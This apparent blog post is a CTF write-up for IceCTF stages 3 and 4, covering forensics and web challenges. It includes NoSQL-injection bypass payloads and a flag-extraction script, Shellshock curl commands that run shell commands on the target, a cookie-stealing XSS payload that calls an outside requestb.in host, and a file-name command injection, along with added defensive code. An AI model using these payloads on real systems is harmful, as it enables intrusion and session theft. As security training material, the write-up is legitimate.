IceCTF{Write_up_Stage3_Stage4}

8:22:00 AM Unknown 0 Comments
Stage 3 

Vape Nation Stego - 50 pt
Open the image in Stegsolve and step through the filters; the flag is hidden in the Green plane 0 filter.

Audio problems Forensics - 50 pt
Open the file in Sonic Visualiser and go to Layer -> Add Spectrogram.


R.I.P Transmission Forensics - 65 pt

Looking at the header of the file, it is an ELF binary.

But when we execute the ELF file with ./rip nothing interesting happens, so I decided to dump its strings and investigate them:

strings rip > rip_strings && subl rip_strings

Something looks weird; maybe there is an embedded file hidden inside. Let's extract it:

foremost -T rip

A password-protected zip file comes out. Let's crack it with fcrackzip:

fcrackzip -u -l 1-6 -c 'a1' 00002585.zip

The password is: bunny

Extract the zip file and bingo, the flag is there.

ChainedIn web 75 pt
The first thing that grabbed my attention was the footer of the home page.

We all know that MongoDB is a NoSQL backend, so the vulnerability is most likely a NoSQL injection. I had read some articles about this type of injection and how to exploit it, and a root-me challenge includes the same vuln. With Burp Suite we can see that the authentication request is sent in JSON format:

{"user":"admin","pass":"admin"}

and the response is:
{"message":"Invalid credential !"}

Let's try to bypass the authentication:
{"user":"admin","pass":{"$ne":"1"}}

We are authenticated as an administrator! So, obviously, it is a NoSQL injection. Good :D
For more information visit http://blog.websecurify.com/2014/08/hacking-nodejs-and-mongodb.html

Let's now try to guess the password:
{"user":{"$ne":"1"},"pass":{"$regex":"I.*$"}}

The server returns {"message":"Welcome back Administrator!"} with 200 OK. Let's try some other character:
{"user":{"$ne":"1"},"pass":{"$regex":"v.*$"}}

The server returns {"message":"Invalid Credentials"} with 500 Internal Server Error.
We know that the flag has the form IceCTF{..., and the service returns 200 OK for a true check and 500 for a false one. This oracle lets us guess the password one character at a time and recover the flag. I wrote a Python script to retrieve it:


import requests

# Candidate characters, tried in order; 'I' comes first because the flag starts with IceCTF{
ascii_letters = 'IabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ{-_}'


def url(password):
    # The server answers 200 when the regex matches the stored password, 500 otherwise
    r = requests.post('http://chainedin.vuln.icec.tf/login',
                      json={"user": {"$ne": "1"}, "pass": {"$regex": password}})
    return r.status_code


def comp(flag):
    # Try each candidate as the next character; return the first one the oracle accepts
    for i in ascii_letters:
        ch = flag + i + '.*$'
        if url(ch) == 200:
            return i
    return None


if __name__ == "__main__":
    flag = "IceCTF{"
    for x in range(1, 60):
        nxt = comp(flag)
        if nxt is None:
            break
        flag += nxt
        print(flag)
        if nxt == '}':
            break


The flag is: IceCTF{I_tou0gHT_Y0u_coulDNt_inJeCt_noSqL_tHanKs_monGo}
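The server side of this bug is worth seeing too. The following is an added example, not code from the challenge or the write-up: it assumes a Python handler that receives the parsed JSON login body as a dict, and it rejects both payloads used above by insisting that user and pass are plain strings (the operator scan is a second layer). The helper names are hypothetical.

```python
from typing import Any, Tuple


class InvalidCredentials(ValueError):
    """Raised when the login body is not a plain {user, pass} string pair."""


def contains_operator(value: Any) -> bool:
    """True if any dict key at any depth starts with '$' (a MongoDB operator)."""
    if isinstance(value, dict):
        return any(k.startswith("$") or contains_operator(v) for k, v in value.items())
    if isinstance(value, list):
        return any(contains_operator(v) for v in value)
    return False


def validate_login(body: Any) -> Tuple[str, str]:
    """Accept only {"user": <str>, "pass": <str>}; reject anything else.

    The type check is the real fix: a dict in place of a string is exactly how
    {"$ne": ...} and {"$regex": ...} reach the query. The operator scan catches
    code paths that forget it.
    """
    if not isinstance(body, dict) or set(body) != {"user", "pass"}:
        raise InvalidCredentials("unexpected body shape")
    if contains_operator(body):
        raise InvalidCredentials("operator in credentials")
    user, password = body["user"], body["pass"]
    if not isinstance(user, str) or not isinstance(password, str):
        raise InvalidCredentials("credentials must be strings")
    return user, password


def build_user_query(body: Any) -> dict:
    """Query that looks up the account by name only; the password is then
    verified with a hash comparison, never by matching it inside the query."""
    user, _ = validate_login(body)
    return {"user": user}


def is_rejected(body: Any) -> bool:
    """Convenience wrapper: True when the body would be refused."""
    try:
        validate_login(body)
    except InvalidCredentials:
        return True
    return False
```

Returning the same error and status code for every failed login also removes the 200/500 oracle the script relies on.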

Geocities web 100 pt
This task took me a while to solve! The service seems clean, nothing looks strange, and the website looks very old. I tried to scan the target to identify anything, using dirsearch, Nikto and Vega, but nothing came out. So I reread the challenge description looking for a hint, and here we go: it may be the Shellshock vulnerability, because the description says "It must be running some ancient technology and probably hasn't been updated in years". I found this article very useful to start the exploit.
Let's check the vuln:
curl -A "() { :; }; echo 'Content-type: text/html'; echo; /usr/bin/id;" http://geocities.vuln.icec.tf/

Bingo! It returns the uid and the gid, so the service is vulnerable to the Shellshock attack.
Now run bash on the host and list the files:
() { :; }; echo 'Content-type: text/html'; echo; /bin/bash -c 'ls'

cat get_posts.pl

User-Agent:() { :; }; echo 'Content-type: text/html'; echo; /bin/bash -c 'cat get_posts.pl'

Obviously the flag is hidden in the database, so we need to fetch the table names from the DB: change the script, save it on your host and download it to the machine using wget.

#!/usr/bin/perl
use strict;
use DBI;
my $dbh = DBI->connect(
    "dbi:mysql:dbname=geocities;host=icectf_mariadb",
    "geocities",
    "geocities",
    { RaiseError => 1 },
) or die $DBI::errstr;
# List every table visible to the geocities user
my @tables = $dbh->tables();
print "$_\n" for @tables;
$dbh->disconnect();
Now change the script to select from the 47a6fd2ca39d2b0d6eea1c30008dd889 table:

#!/usr/bin/perl
use strict;
use DBI;

my $dbh = DBI->connect(
    "dbi:mysql:dbname=geocities;host=icectf_mariadb",
    "geocities",
    "geocities",
    { RaiseError => 1 },
) or die $DBI::errstr;

# Dump the whole table; the flag is in one of the rows
my $sth = $dbh->prepare("SELECT * FROM 47a6fd2ca39d2b0d6eea1c30008dd889");
$sth->execute();

my $row;
while ($row = $sth->fetchrow_arrayref()) {
    print "@$row[1];@$row[2];@$row[3]\n";
}

$sth->finish();
$dbh->disconnect();

The flag is: IceCTF{7h3_g0s_WEr3_5UpeR_wE1Rd_mY_3ye5_HUr7}
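From the defender's side, the Shellshock requests above leave a very recognisable trace in the web server logs. The following is an added example, not part of the write-up: it assumes Apache/nginx "combined" log format, and the log lines are constructed for this example (the attacker addresses are documentation ranges).

```python
import re
from typing import List, Tuple

# Constructed sample log: one benign request, two carrying the "() { :; };"
# prologue in different headers (User-Agent and Referer), one with extra whitespace.
SAMPLE_LOG = r'''
198.51.100.7 - - [10/Aug/2016:08:22:00 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"
203.0.113.9 - - [10/Aug/2016:08:22:05 +0000] "GET / HTTP/1.1" 200 77 "-" "() { :; }; echo 'Content-type: text/html'; echo; /usr/bin/id;"
203.0.113.9 - - [10/Aug/2016:08:22:09 +0000] "GET /cgi-bin/get_posts.pl HTTP/1.1" 200 91 "() { :;}; /bin/bash -c 'ls'" "curl/7.47.0"
203.0.113.12 - - [10/Aug/2016:08:23:41 +0000] "GET / HTTP/1.1" 200 512 "-" "()  {  :;  };  /bin/bash -c 'cat get_posts.pl'"
'''.strip()

# Shellshock trigger: an exported function definition "() {" at the start of an
# environment variable value, a body, then a ';' after the closing brace where the
# trailing command begins. Whitespace is flexible; requiring "}" and ";" keeps
# ordinary prose containing "() {" from matching.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{\s*:?;?\s*\}\s*;")

COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


def parse_combined(line: str):
    """Split one combined-format line into named fields, or None if it does not parse."""
    m = COMBINED_RE.match(line)
    return m.groupdict() if m else None


def find_shellshock(log_text: str) -> List[Tuple[str, str, str]]:
    """Return (client ip, header name, header value) for every header that
    carries the Shellshock prologue; Referer and User-Agent are both checked
    because CGI exports each of them as an environment variable."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_combined(line)
        if rec is None:
            continue
        for header in ("referer", "ua"):
            if SHELLSHOCK_RE.search(rec[header]):
                hits.append((rec["ip"], header, rec[header]))
    return hits
```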


Intercepted Conversations Pt. 1
Intercepted Conversations Pt. 2

Stage 4

ImgBlog web 130 pt
After registering and logging in, we checked the comment field: it is vulnerable to XSS.

We need to get the admin session to log in as admin:
<img src=x onerror=this.src='http://requestb.in/xfkbrpxf?c='+document.cookie>

Now we have the admin session. Replace the current session cookie with a cookie manager and refresh the page:

session=eyJ1c2VyIjoxfQ.CpyE3w.eBmlIu3HEm7vpDtAlE63CbMIK5A

And here we go, we are in!
I tried for a while to upload pictures and to inject the file name with a null byte, a double extension, and SQL injection in the comment, but nothing worked. I noticed that the service filters the "filename" field of our requests, removing dots and slashes, and then passes it to the Linux shell; I think it's PHP's shell_exec() function. So let's inject export $PATH to see how it reacts!

The system PATH is shown! So let's list the files:

filename=" $HOME | ls "

We identified the flag.txt file.

filename=" $HOME | cat fl* "
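Stripping dots and slashes, as this service does, leaves `$HOME` and `|` untouched, which is why the two filenames above work. The following is an added example, not code from the challenge: it contrasts that filter with an allow-list plus a server-generated name and a no-shell argv, assuming the uploaded file is later passed to a command-line tool. The helper names are hypothetical.

```python
import re
import secrets
import shlex
from typing import List


def naive_filter(filename: str) -> str:
    """The filter the write-up describes: only dots and slashes are removed."""
    return filename.replace(".", "").replace("/", "")


def vulnerable_command(filename: str) -> str:
    """The string a shell_exec()-style call would hand to /bin/sh after the naive
    filter. Built for comparison only; it is never executed here."""
    return "file uploads/" + naive_filter(filename)


# Allow-list: a short basename of letters, digits, '_' and '-', then one image extension.
SAFE_NAME = re.compile(r"^[A-Za-z0-9_-]{1,64}\.(png|jpe?g|gif)$", re.IGNORECASE)


def is_safe_name(filename: str) -> bool:
    """True only for names that match the allow-list exactly (no spaces, '$', '|', '*')."""
    return SAFE_NAME.fullmatch(filename) is not None


def stored_name(filename: str) -> str:
    """Never reuse the client's name on disk: keep only the validated extension
    and generate the basename server-side."""
    if not is_safe_name(filename):
        raise ValueError("rejected file name")
    ext = filename.rsplit(".", 1)[1].lower()
    return f"{secrets.token_hex(16)}.{ext}"


def safe_argv(filename: str) -> List[str]:
    """argv for subprocess.run(argv) with shell=False: there is no shell to parse
    metacharacters, so the name is data rather than syntax."""
    return ["file", "--", "uploads/" + stored_name(filename)]


def quoted_fallback(filename: str) -> str:
    """If a shell really is unavoidable, shlex.quote wraps the argument in single
    quotes so $HOME and | are passed literally."""
    return "file -- " + shlex.quote(filename)
```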
